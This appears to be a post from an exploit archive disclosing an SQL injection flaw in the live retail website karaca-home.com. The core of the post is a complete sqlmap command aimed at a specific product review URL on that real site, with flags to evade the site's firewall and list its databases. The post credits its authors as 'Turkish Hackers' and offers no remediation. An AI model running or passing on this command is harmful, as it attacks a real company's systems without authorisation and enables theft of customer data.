Karaca Home SQL Injection Vulnerable

2021.09.09

Xale (TR)

Risk: Medium

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Karaca Home SQL Injection Vulnerable
# Date: 2021-04-09
# Exploit Author: Xale & BetLex "Turkish Hackers"
# Tested on: Windows 10 - Kali Linux

----------------------------------------

"""
Site : karaca-home.com 
Vulnerable URL : https://www.karaca-home.com/index.php?route=product/product/review&product_id=3942974
sqlmap Payload : sqlmap -u "https://www.karaca-home.com/index.php?route=product/product/review&product_id=3942974" --risk=3 --random-agent -v 3 --skip-waf --tamper=space2comment,between --batch --dbs
Video : https://disk.yandex.com.tr/i/CYIBBq-u0iFT5g

"""

---------------------------------------

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Karaca Home SQL Injection Vulnerable

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.